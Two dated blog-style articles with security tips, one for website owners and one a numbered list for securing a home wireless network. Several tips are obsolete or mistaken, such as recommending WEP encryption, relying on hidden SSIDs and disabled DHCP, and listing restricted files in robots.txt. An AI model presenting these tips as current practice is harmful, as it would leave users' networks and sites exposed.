Signing up for updates for scripts (programs) your site uses will let you know if there are any. You should use the latest update to protect yourself. This is often the reason the update is released. If you are unsure of the scripts used on your website, contact your web developer.

Remove unnecessary files

Your website changes, old files are ignored. They should be removed. Keep copies offline in case you wish to add them again, but remember to update any scripts. Old files are often indexed by search engines. So even if you do not link to those pages anymore, the search engines lists them for Internet users to find and visit. Automated programs to search for these files can find them to exploit them.

Implement passwords

Any sensitive files, databases or scripts should be protected. Please use passwords that are difficult to guess. Use letters AND numbers, but be careful to keep the number of characters within the programmed limits and remember that passwords are case-sensitive.

Include robots.txt

Create a file to tell search engines not to index files that are restricted to certain users. You can also disallow indexing of images, so people who search for images to use illegal do not steal your images.

Check permissions of uploaded files

Left-click each filename in your web host server, then right-click and select CHMOD to make sure files are set to the proper permissions. Check with your web host if you are unsure. Remember to upload images as binary and most other files as ASCII files. Choosing Auto for automatic selection may be incorrect if certain extensions are not specified.

Protect email addresses

If you ever got a strange email that tested your form or simply sent you an email to yourself, one of those spammer programs found your email address from your website or someone else’s. There are scripts to split up your email address, so spammer software programs cannot read them. Another way is to place your email address in an image or simply have an “Email us” link. I haven’t done this, but I didn’t have any problems until recently. I still want to make my contact information visible to my target audience.

If you sign guestbooks, go to forums or newsgroups, or share your email address with anyone else, your email address can be posted and shared all over the Internet. I often use several email addresses when making posts, because spammers look there first for email addresses. To spammers, a guestbook is an email address database. So use a Hotmail account for your email, but you can still include your web address in your signature. If the Internet user visits your site, the user can contact you using the link on your site. The spammers probably won’t visit your site, so the spam goes to the posted email address.

Protect your source code

Some people use that stupid right-click script to protect their source code. Not only does that not protect your code, you are disabling browser functions such as adding your site to their favorites or printing. Though many people have “borrowed” my source code, I would not want to disable functions that my target audience wants to use. There are scripts to make your source code hidden. This is more effective, but a pain for anyone who wants to edit your site. The preferred method is external files such as external style sheets or javascript files.

Include copyright information on the page and in the meta tags for every web page. Watermark all images. Keep copies of previous versions of your site with the last modified information intact. Save files on disks, so they can be retrieved. if necessary. Visit the WayBack Machineo find previous versions of websites, if you cannot find your files. Though the information is incomplete, it is better than nothing. Buy the copyrights to important files to protect yourself from competitors or other parties.

Enjoy .......

Steps to Better Secure Your Wireless Network From Hackers

Steps to Better Secure Your Wireless Network From Hackers

The reason we secure a wireless network is to stop people from using the services of our network who don’t have permission to utilize them. It is harder to secure a wireless network from hackers as compared to a classic wired network. This is due to the fact that a wireless network can be accessed anywhere inside the range of its antenna.

In order to secure a wireless network from hackers, we should take proper steps to save ourselves against security issues. If you don’t secure a wireless network from hackers, you might end up without its service. The consequence might also include the utilization of our network to attack further networks. To secure a wireless network from hackers, you should follow these simple wireless networking tips:

1) Strategic antenna placement:

The first thing you have to do is to position the access point’s antenna in a place which restricts the range of its signal to go further than the required area. You should not put the antenna close to a window because glass can’t obstruct its signals. Place it in a central location of the building.

2) Use WEP:

WEP stands for Wireless encryption protocol. It’s a customary technique for encrypting traffic on a wireless network. You should never skip it as that will allow hackers to get instant access to the traffic over a wireless network.

3) Change the SSID, disable the broadcast of SSID:

SSID stands for service set identifier. It is the recognition thread utilized by the wireless access point due to which the customers are capable of starting connections. For every wireless access point arranged, select an exclusive as well as unique SSID. Also, if it’s attainable, hold back the broadcast of the SSID out over the antenna. It wont appear in the listing of offered networks, while being able to provide services as usual.

4) Disable DHCP:

By doing this, the hackers will have to decode the TCP/IP parameters, subnet mask as well as the IP address in order to hack your wireless network.

5) Disable or modify SNMP settings:

Change the private as well as public community settings of SNMP. You can also just disable it. Otherwise the hackers will be able to utilize SNMP to get significant info regarding your wireless network.

6) Utilize access lists:

For additional security of your wireless network, and if your access point support this feature, employ an access list. An access list lets us determine precisely which machinery is permitted to attach to an access point. The access points which include the access list can employ trivial file transfer protocol (TFTP) now and then in order to download modernized lists to steer clear of hackers.
